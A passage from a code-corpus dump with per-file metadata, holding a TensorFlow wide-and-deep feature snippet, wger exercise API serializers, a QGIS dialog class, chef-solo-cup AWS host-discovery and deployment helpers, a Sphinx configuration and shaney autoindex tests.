# to the values of that column stored in a tf.SparseTensor.
categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].values,
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS
}
# Merges the two dictionaries into one.
feature_cols = dict(continuous_cols)
feature_cols.update(categorical_cols.items())
# Converts the label column into a constant Tensor.
label = tf.constant(df[LABEL_COLUMN].values)
# Returns the feature columns (data matrix X) and the label(y) all represented as tensors.
return feature_cols, label
def train_input_fn(df_train):
return input_fn(df_train)
def eval_input_fn(df_test):
return input_fn(df_test)
# DEFINES THE TRANSFORMATIONS EACH FEATURE_TENSOR WILL SUPPORT.
def feature_transformations():
## CATEGORICAL FEATURES
gender = tf.contrib.layers.sparse_column_with_keys(column_name="gender", keys=["Female", "Male"])
race = tf.contrib.layers.sparse_column_with_keys(column_name="race", keys=["White", "Black"])
education = tf.contrib.layers.sparse_column_with_hash_bucket("education", hash_bucket_size=1000)
relationship = tf.contrib.layers.sparse_column_with_hash_bucket("relationship", hash_bucket_size=100)
workclass = tf.contrib.layers.sparse_column_with_hash_bucket("workclass", hash_bucket_size=100)
occupation = tf.contrib.layers.sparse_column_with_hash_bucket("occupation", hash_bucket_size=1000)
native_country = tf.contrib.layers.sparse_column_with_hash_bucket("native_country", hash_bucket_size=1000)
## CONTINUOS FEATURES
age = tf.contrib.layers.real_valued_column("age")
education_num = tf.contrib.layers.real_valued_column("education_num")
capital_gain = tf.contrib.layers.real_valued_column("capital_gain")
capital_loss = tf.contrib.layers.real_valued_column("capital_loss")
hours_per_week = tf.contrib.layers.real_valued_column("hours_per_week")
## TRANSFORMATIONS
### BUCKETIZATION OF CONTINOUS FEATURES
age_buckets = tf.contrib.layers.bucketized_column(age, boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
## DIFFERENT FEATURE SETS
wide_columns = [gender, native_country, education, occupation, workclass,
relationship, age_buckets,
tf.contrib.layers.crossed_column([education, occupation],
hash_bucket_size=int(1e4)),
tf.contrib.layers.crossed_column(
[age_buckets, education, occupation],
hash_bucket_size=int(1e6)),
tf.contrib.layers.crossed_column([native_country, occupation],
hash_bucket_size=int(1e4))]
deep_columns = [
tf.contrib.layers.embedding_column(workclass, dimension=8),
tf.contrib.layers.embedding_column(education, dimension=8),
tf.contrib.layers.embedding_column(gender, dimension=8),
tf.contrib.layers.embedding_column(relationship, dimension=8),
tf.contrib.layers.embedding_column(native_country,
dimension=8),
tf.contrib.layers.embedding_column(occupation, dimension=8),
age,
education_num,
capital_gain,
capital_loss,
hours_per_week]
return [wide_columns, deep_columns]
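# Illustrative sketch (added for clarity, not part of the original module): the
# two feature sets returned by feature_transformations() are typically wired
# into a TF 1.x "wide & deep" estimator. The estimator class, hidden-unit sizes
# and function name below are assumptions for demonstration only.
def build_estimator(model_dir):
  wide_columns, deep_columns = feature_transformations()
  # Linear model over the wide (sparse/crossed) columns, DNN over embeddings.
  return tf.contrib.learn.DNNLinearCombinedClassifier(
      model_dir=model_dir,
      linear_feature_columns=wide_columns,
      dnn_feature_columns=deep_columns,
      dnn_hidden_units=[100, 50])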
| apache-2.0 | 1,279,183,477,228,595,000 | 35.44898 | 123 | 0.703434 | false |
wger-project/wger | wger/exercises/api/serializers.py | 1 | 4625 | # -*- coding: utf-8 -*-
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
# Third Party
from rest_framework import serializers
# wger
from wger.exercises.models import (
Equipment,
Exercise,
ExerciseBase,
ExerciseCategory,
ExerciseComment,
ExerciseImage,
Muscle,
)
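# Django REST Framework serializers for the exercise models. The plain
# serializers below expose primary keys; ExerciseInfoSerializer at the end
# nests the related category, muscles, equipment, images and comments instead.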
class ExerciseBaseSerializer(serializers.ModelSerializer):
"""
Exercise serializer
"""
class Meta:
model = ExerciseBase
fields = [
'id',
'uuid',
'category',
'muscles',
'muscles_secondary',
'equipment',
'creation_date',
]
class EquipmentSerializer(serializers.ModelSerializer):
"""
Equipment serializer
"""
class Meta:
model = Equipment
fields = [
'id',
'name',
]
class ExerciseImageSerializer(serializers.ModelSerializer):
"""
ExerciseImage serializer
"""
class Meta:
model = ExerciseImage
fields = [
'id',
'uuid',
'exercise_base',
'image',
'is_main',
'status',
]
class ExerciseCommentSerializer(serializers.ModelSerializer):
"""
ExerciseComment serializer
"""
class Meta:
model = ExerciseComment
fields = [
'id',
'exercise',
'comment',
]
class ExerciseCategorySerializer(serializers.ModelSerializer):
"""
ExerciseCategory serializer
"""
class Meta:
model = ExerciseCategory
fields = ['id', 'name']
class MuscleSerializer(serializers.ModelSerializer):
"""
Muscle serializer
"""
class Meta:
model = Muscle
fields = [
'id',
'name',
'is_front',
'image_url_main',
'image_url_secondary',
]
class ExerciseSerializer(serializers.ModelSerializer):
"""
Exercise serializer
The fields from the new ExerciseBase are retrieved here as to retain
compatibility with the old model where all the fields where in Exercise.
"""
category = serializers.PrimaryKeyRelatedField(read_only=True)
muscles = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
muscles_secondary = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
equipment = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
variations = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta:
model = Exercise
fields = (
"id",
"uuid",
"name",
"exercise_base",
"status",
"description",
"creation_date",
"category",
"muscles",
"muscles_secondary",
"equipment",
"language",
"license",
"license_author",
"variations",
)
class ExerciseInfoSerializer(serializers.ModelSerializer):
"""
Exercise info serializer
"""
images = ExerciseImageSerializer(many=True, read_only=True)
comments = ExerciseCommentSerializer(source='exercisecomment_set', many=True, read_only=True)
category = ExerciseCategorySerializer(read_only=True)
muscles = MuscleSerializer(many=True, read_only=True)
muscles_secondary = MuscleSerializer(many=True, read_only=True)
equipment = EquipmentSerializer(many=True, read_only=True)
variations = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta:
model = Exercise
depth = 1
fields = [
"id",
"name",
"uuid",
"description",
"creation_date",
"category",
"muscles",
"muscles_secondary",
"equipment",
"language",
"license",
"license_author",
"images",
"comments",
"variations",
]
| agpl-3.0 | 7,936,270,238,942,832,000 | 23.865591 | 97 | 0.588541 | false |
mk45/road_project | dialog.py | 1 | 1349 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2015 Maciej Kamiński ([email protected]) Politechnika Wrocławska
#
# This source is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
###############################################################################
__author__ = 'Maciej Kamiński Politechnika Wrocławska'
import os
from PyQt4 import QtGui, uic
FORM_CLASS, _ = uic.loadUiType(os.path.join(
os.path.dirname(__file__), 'dialog.ui'))
class Dialog(QtGui.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(Dialog, self).__init__(parent)
self.setupUi(self)
| gpl-2.0 | 8,945,893,947,594,751,000 | 37.428571 | 88 | 0.635688 | false |
josegonzalez/chef-solo-cup | chef_solo_cup/helpers.py | 1 | 15230 | # -*- coding: utf-8 -*-
from __future__ import with_statement
import base64
import collections
import itertools
import json
import os
import re
import sys
import unidecode
import urllib2
from boto.ec2 import connect_to_region
from boto.exception import EC2ResponseError
import boto.ec2.autoscale
from fabric.api import run, sudo
from fabric.contrib.project import rsync_project
from chef_solo_cup.log import setup_custom_logger
def get_hosts(args, logger=None):
dna_path = os.path.join(os.path.realpath(os.getcwd()), 'dna')
includes = []
if args['dna_patterns']:
includes = map(lambda x: re.compile(x, re.I), args['dna_patterns'])
excludes = []
if args['exclude']:
excludes = map(lambda x: re.compile(x, re.I), args['exclude'])
all_hosts = itertools.chain(
get_filesystem_hosts(args, dna_path, logger=logger),
get_asg_hosts(args, dna_path, logger=logger),
)
hosts = _collect_valid_hosts(
all_hosts,
excludes,
includes,
args,
logger=logger
)
hosts = filter_hosts(args, hosts, logger=logger)
hosts = collections.OrderedDict(sorted(hosts.items()))
if args['quantity'] is not None:
x = itertools.islice(hosts.items(), 0, int(args['quantity']))
hosts = {}
for key, value in x:
hosts[key] = value
hosts = collections.OrderedDict(sorted(hosts.items()))
return hosts
def _collect_valid_hosts(all_hosts, excludes, includes, args, logger=None):
hosts = {}
for host, data in all_hosts:
if _skip_host(data, excludes, includes, args, logger=logger):
continue
if 'public_ip' in data and not data['public_ip']:
del data['public_ip']
if 'private_ip' in data and not data['private_ip']:
del data['private_ip']
data['host'] = host
valid_hosts = [data.get('public_ip'), data.get('private_ip'), host]
for hostname in valid_hosts:
if hostname:
data['host'] = hostname
break
hosts[host] = data
return hosts
def _skip_host(data, excludes, includes, args, logger=None):
f = data.get('file', '')
for key, value in _resolve_tags(args).iteritems():
if value != data.get('tags', {}).get(key, None):
logger.debug('Skipping {0} because tags dont match'.format(f))
return True
if len(excludes):
skip = map(lambda regex: regex.search(f), excludes)
skip = reduce(lambda x, y: x or y, skip)
if skip:
logger.debug('Skipping {0} because exclusion rule'.format(f))
return True
if len(includes):
skip = map(lambda regex: regex.search(f), includes)
skip = reduce(lambda x, y: x or y, skip)
if skip is None:
logger.debug('Skipping {0} because inclusion rule'.format(f))
return True
if args['regions'] and data.get('region') not in args['regions']:
logger.debug('Skipping {0} because regions dont match'.format(f))
return True
if args['providers'] and data.get('provider') not in args['providers']:
logger.debug('Skipping {0} because providers dont match'.format(f))
return True
if args['services'] and data.get('service') not in args['services']:
logger.debug('Skipping {0} because services dont match'.format(f))
return True
return False
def _resolve_tags(args):
if not args.get('tags', None):
return {}
tags = {}
for tag in args.get('tags', {}):
key, value = tag.split('=')
tags[key] = value
return tags
def get_filesystem_hosts(args, dna_path, logger=None):
for root, sub_folders, files in os.walk(dna_path):
files = filter(lambda f: ".json" in f, files)
for f in files:
path = root.split("/")
region = path.pop()
provider = path.pop()
service = path.pop()
host = f.replace(".json", "")
if host in ["all", "default"]:
continue
yield host, {
'file': f,
'path': os.path.join(root, f),
'root': root,
'region': region,
'provider': provider,
'service': service,
'tags': {},
'dna_path': "dna/{0}/{1}/{2}/{3}".format(
service,
provider,
region,
f
)
}
def get_asg_hosts(args, dna_path, logger=None):
if not args['regions']:
return
if not args['aws_access_key_id'] or not args['aws_secret_access_key']:
return
cwd = os.path.realpath(os.getcwd())
asg_path = os.path.join(cwd, args['asg_dna_path'])
asg_dna_files = []
for f in os.listdir(asg_path):
if os.path.isfile(os.path.join(asg_path, f)):
asg_dna_files.append(f)
response = _get_api_response(args, region=None, logger=logger)
if response:
for region in args['regions']:
groups = _group_from_region(response, region)
for group, instances in groups.items():
group_name = group.strip()
if args['use_alternate_databag']:
group_dna_file = _get_group_dna_file(
args['use_alternate_databag'],
asg_dna_files)
else:
group_dna_file = _get_group_dna_file(
group_name,
asg_dna_files)
logger.debug('== [group:{0}] [use_alternate_databag:{1}] [databag:{2}]'.format(
group,
args['use_alternate_databag'],
group_dna_file))
for name, instance in instances.items():
yield name, {
'file': slugify(name.strip()),
'region': region,
'provider': 'AWS',
'private_ip': instance['private_ip_address'],
'public_ip': instance['ip_address'],
'group_name': instance['tags']['aws:autoscaling:groupName'], # noqa
'tags': instance['tags'],
'dna_path': os.path.join(
args['asg_dna_path'],
dna_file_name_from_tags(
args,
group_dna_file.strip(),
instance['tags'])
),
}
else:
for region in args['regions']:
auto_scale_conn = _connection_autoscale(args, region)
conn = _connection_ec2(args, region)
for group in auto_scale_conn.get_all_groups():
instance_ids = [i.instance_id for i in group.instances]
if not instance_ids:
continue
try:
reservations = conn.get_all_instances(instance_ids)
except EC2ResponseError:
continue
group_name = group.name.strip()
if args['use_alternate_databag']:
group_dna_file = _get_group_dna_file(
args['use_alternate_databag'],
asg_dna_files)
else:
group_dna_file = _get_group_dna_file(
group_name,
asg_dna_files)
instances = [i for r in reservations for i in r.instances]
for instance in instances:
name = '{0}-{1}'.format(group_name, instance.id)
yield name, {
'file': slugify(name.strip()),
'region': region,
'provider': 'AWS',
'public_ip': instance.ip_address,
                        'private_ip': instance.private_ip_address,
                        'group_name': instance.tags['aws:autoscaling:groupName'], # noqa
                        'tags': instance.tags,
'dna_path': os.path.join(
args['asg_dna_path'],
dna_file_name_from_tags(
args,
group_dna_file.strip(),
                                instance.tags)
),
}
def _group_from_region(response, region):
groups = {}
for group, instances in response.items():
in_region = False
for name, instance in instances.items():
in_region = instance['region'] == region
break
if not in_region:
continue
groups[group] = {}
for name, instance in instances.items():
groups[group][name] = instance
return groups
def _connection_autoscale(args, region):
return boto.ec2.autoscale.connect_to_region(
region,
aws_access_key_id=args['aws_access_key_id'],
aws_secret_access_key=args['aws_secret_access_key'],
)
def _connection_ec2(args, region):
return connect_to_region(
region,
aws_access_key_id=args['aws_access_key_id'],
aws_secret_access_key=args['aws_secret_access_key'],
)
def _get_api_response(args, region=None, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if not args['api_url']:
return None
request_url = '{0}/nodes/group?status={1}'.format(
args['api_url'],
'running'
)
if region is not None:
        request_url = '{0}&region={1}'.format(request_url, region)
request = urllib2.Request(request_url)
has_username = 'api_username' in args
has_password = 'api_password' in args
if has_username and has_password:
base64string = base64.encodestring('{0}:{1}'.format(
args['api_username'], args['api_password']
)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
result = urllib2.urlopen(request)
if int(result.getcode()) not in [200, 201, 204]:
error = 'Bad response from api'
try:
data = json.loads(result.read())
error = data.get('message', 'Bad response from api')
except:
pass
logger.error(error)
sys.exit(1)
response = None
try:
response = json.loads(result.read())
except ValueError:
logger.error('Invalid json response from api')
sys.exit(1)
groups = response['groups']
if 'None' in groups:
del groups['None']
return groups
def _get_group_dna_file(group_name, asg_dna_files):
group_name = slugify(rchop(group_name, '.json'))
group_dna_file = None
for asg_dna_file in asg_dna_files:
if asg_dna_file == group_name:
group_dna_file = asg_dna_file
break
group_name_json = group_name + '.json'
if asg_dna_file == group_name_json:
group_dna_file = asg_dna_file
break
if not group_dna_file:
for asg_dna_file in asg_dna_files:
if group_name.startswith(asg_dna_file):
group_dna_file = asg_dna_file
break
stripped_asg_dna_file = asg_dna_file.replace('.json', '')
if group_name.startswith(stripped_asg_dna_file):
group_dna_file = asg_dna_file
break
if not group_dna_file:
group_dna_file = group_name
return group_dna_file
def dna_file_name_from_tags(args, dna_file_name, tags):
env_tag = args['environment_tag']
strip_env = args['strip_environment_from_dna_file_run_tag']
tag = args['dna_file_tag']
if not args['use_alternate_databag'] and args['dna_file_tag'] and tags.get(args['dna_file_tag'], None):
dna_file_name = tags.get(tag, None)
if strip_env and env_tag and tags.get(env_tag, None):
environment = tags.get(env_tag, None)
dna_file_name = strip_left(dna_file_name, environment)
dna_file_name = strip_right(dna_file_name, environment)
dna_file_name = dna_file_name.strip('_-')
dna_file_name = rchop(dna_file_name, '.json') + '.json'
return dna_file_name
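# Worked example for dna_file_name_from_tags (hypothetical argument values,
# for illustration only):
#   args = {'use_alternate_databag': False, 'dna_file_tag': 'role',
#           'environment_tag': 'env',
#           'strip_environment_from_dna_file_run_tag': True}
#   tags = {'role': 'prod-webserver', 'env': 'prod'}
#   dna_file_name_from_tags(args, 'default', tags)  # -> 'webserver.json'
# The 'role' tag overrides the group-derived name, the 'prod' environment
# prefix is stripped, and a single '.json' suffix is normalized onto the end.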
def strip_right(text, suffix):
if not text.endswith(suffix):
return text
return text[:len(text)-len(suffix)]
def strip_left(text, prefix):
if not text.startswith(prefix):
return text
return text[len(prefix):]
def rsync_project_dry(args, logger=None, **kwargs):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[RSYNC_PROJECT] From {0} to {1} with opts='{2}' excluding='{3}'".format(kwargs.get('local_dir'), kwargs.get('remote_dir'), kwargs.get('extra_opts'), kwargs.get('exclude'))) # noqa
else:
out = rsync_project(**kwargs)
if out.return_code != 0:
logger.info("[RSYNC_PROJECT] Failed command with status code {0}, please run `chef-solo-cup clean` against this node".format(out.return_code)) # noqa
sys.exit(0)
def run_dry(cmd, args, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[RUN] {0}".format(cmd))
else:
return run(cmd)
def sudo_dry(cmd, args, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
if args['dry_run']:
logger.info("[SUDO] {0}".format(cmd))
else:
return sudo(cmd)
def add_line_if_not_present_dry(args, filename, line, run_f=run, logger=None):
if logger is None:
logger = setup_custom_logger('chef-solo-cup', args)
cmd = "grep -q -e '{0}' {1} || echo '{0}' >> {1}".format(line, filename)
if args['dry_run']:
logger.info("[SUDO] {0}".format(cmd))
else:
run_f(cmd)
def filter_hosts(args, hosts, logger=None):
rules = args['blacklist_rules'].get(args['command'])
if not rules:
return hosts
excludes = []
for rule in rules:
if rule.startswith('/') and rule.endswith('/'):
pattern = rule[1:-1]
if not pattern:
continue
excludes.append(pattern)
else:
excludes.append(rule)
excludes = map(lambda x: re.compile(x), excludes)
new_hosts = {}
for host, config in hosts.items():
skip = map(lambda regex: regex.search(host), excludes)
skip = reduce(lambda x, y: x or y, skip)
if skip:
continue
new_hosts[host] = config
return new_hosts
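# Sketch of the blacklist_rules shape filter_hosts expects (hypothetical
# values): entries wrapped in '/.../' have the slashes stripped, otherwise the
# string is compiled as a regex directly, and any host whose name matches one
# of the resulting patterns is dropped for that command.
#   args = {'command': 'deploy',
#           'blacklist_rules': {'deploy': ['/^db-/', 'staging']}}
#   filter_hosts(args, hosts)  # drops e.g. 'db-01' and any name containing
#                              # 'staging'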
def slugify(text):
if type(text) == unicode:
text = unidecode.unidecode(text)
text = text.strip()
text = text.lower()
text = re.sub(r'[^a-z0-9_-]+', '-', text)
text = re.sub(r'-{2,}', '-', text)
return text
def rchop(s, ending):
if s.endswith(ending):
return s[:-len(ending)]
return s
| mit | -8,145,522,986,752,087,000 | 30.273101 | 201 | 0.535259 | false |
scikit-learn-contrib/project-template | doc/conf.py | 1 | 10143 | # -*- coding: utf-8 -*-
#
# project-template documentation build configuration file, created by
# sphinx-quickstart on Mon Jan 18 14:44:12 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_gallery
import sphinx_rtd_theme
# Add to sys.path the top-level directory where the package is located.
sys.path.insert(0, os.path.abspath('..'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'numpydoc',
'sphinx_gallery.gen_gallery',
]
# this is needed for some reason...
# see https://github.com/numpy/numpydoc/issues/69
numpydoc_show_class_members = False
# pngmath / imgmath compatibility layer for different sphinx versions
import sphinx
from distutils.version import LooseVersion
if LooseVersion(sphinx.__version__) < LooseVersion('1.4'):
extensions.append('sphinx.ext.pngmath')
else:
extensions.append('sphinx.ext.imgmath')
autodoc_default_flags = ['members', 'inherited-members']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# generate autosummary even if no references
autosummary_generate = True
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# Generate the plots for the gallery
plot_gallery = True
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'sklearn-template'
copyright = u'2016, Vighnesh Birodkar'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from skltemplate import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', '_templates']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Custom style
html_style = 'css/project-template.css'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'project-templatedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'project-template.tex', u'project-template Documentation',
u'Vighnesh Birodkar', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'project-template', u'project-template Documentation',
[u'Vighnesh Birodkar'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'project-template', u'project-template Documentation',
u'Vighnesh Birodkar', 'project-template', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
# intersphinx configuration
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'sklearn': ('http://scikit-learn.org/stable', None)
}
# sphinx-gallery configuration
sphinx_gallery_conf = {
'doc_module': 'skltemplate',
'backreferences_dir': os.path.join('generated'),
'reference_url': {
'skltemplate': None}
}
def setup(app):
# a copy button to copy snippet of code from the documentation
app.add_javascript('js/copybutton.js')
| bsd-3-clause | -1,843,109,958,325,797,000 | 30.696875 | 80 | 0.709751 | false |
jaredjennings/shaney | shaney/generators/test/test_autoindex.py | 1 | 6482 | # shaney - prepare Puppet code with LaTeX comments for multiple audiences.
# Based on <https://github.com/afseo/cmits>.
# Copyright (C) 2015 Jared Jennings, [email protected].
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from shaney.generators.test import CoroutineTest
from shaney.generators.autoindex import autoindex
import new
class TestUnrecognizedPassesThrough(CoroutineTest):
"""Whatever the autoindexer does not care about, it sends through:"""
coroutine_under_test = autoindex
send = [
('comment', 'bla'),
('verbatim', ''),
('fnord', 'bletch'),
]
expect = [
('comment', 'bla'),
('verbatim', ''),
('fnord', 'bletch'),
]
class AutoIndexTest(CoroutineTest):
# You can't say """ inside of a triple-quoted string, you have to
# say ""\". So when you see ""\" in the example it means you should
# write """. Also you have to escape backslashes in a non-raw
# string, so \\ below means \.
"""Test most properties of autoindex.
The autoindexer expects to be sent tuples denoting what's going on
in an input file, like this set::
('comment', 'some documentation about this Puppet class')
('verbatim', 'class puppetclass {')
('verbatim', ' mumble')
('verbatim', '}')
It won't act on anything that isn't toplevel, so for most of our
tests, we'll want to send in a bunch of ('verbatim', 'foo'). This
class factors that out, so you can make the send value less verbose.
Also, unless you write the docstring strangely, there will always be
a blank line at the end of send; this class will automatically add
('verbatim', '') to the expect so you don't have to write it.
Example::
class TestThingAutoindexDoes(AutoindexTest):
""\"When it sees an include, it emits ('include', 'thing'):""\"
send = ""\"\\
include two
""\"
expect = [
('include', 'two'),
('verbatim', 'line two'),
]
"""
send = ''
expect = []
coroutine_under_test = autoindex
def preprocess_send(self):
for x in self.send.split("\n"):
yield ('verbatim', x)
def preprocess_expect(self):
for x in self.expect:
yield x
yield ('verbatim', '')
class TestClassDefinition(AutoIndexTest):
"""Classes defined are indexed:"""
send = """\
class foo::bar {
some stuff
}
"""
expect = [
('index_entry', 'class', 'foo::bar', 'defined'),
('label', 'class_foo::bar'),
('verbatim', 'class foo::bar {'),
('verbatim', ' some stuff'),
('verbatim', '}'),
]
class TestParameterizedClassDefinition(AutoIndexTest):
"""When classes are defined with parameters, only the name is indexed:"""
send = """\
class foo::bar($param1, $param2) {
some stuff
}
"""
expect = [
('index_entry', 'class', 'foo::bar', 'defined'),
('label', 'class_foo::bar'),
('verbatim', 'class foo::bar($param1, $param2) {'),
('verbatim', ' some stuff'),
('verbatim', '}'),
]
class TestClassUseByInclude(AutoIndexTest):
"""Classes used by means of `include` are indexed:"""
send = """\
include foo_bar::baz
"""
expect = [
('index_entry', 'class', 'foo_bar::baz'),
('verbatim', ' include foo_bar::baz'),
('margin_ref', 'class_foo_bar::baz'),
]
class TestClassUseByClassBracket(AutoIndexTest):
"""Classes used by means of ``class {...}``` are not yet supported:"""
send = """\
class { 'foo::bar':
bla
}
"""
expect = [
('index_entry', 'class', 'foo::bar'),
('verbatim', "class { 'foo::bar':"),
('margin_ref', 'class_foo::bar'),
('verbatim', ' bla'),
('verbatim', '}'),
]
class TestDefinedResourceTypeDefinition(AutoIndexTest):
"""Defined resource types are indexed:"""
send = """\
define foo_bar::baz($paramOne,
$paramTwo) {
}
"""
expect = [
('index_entry', 'define', 'foo_bar::baz', 'defined'),
('label', 'define_foo_bar::baz'),
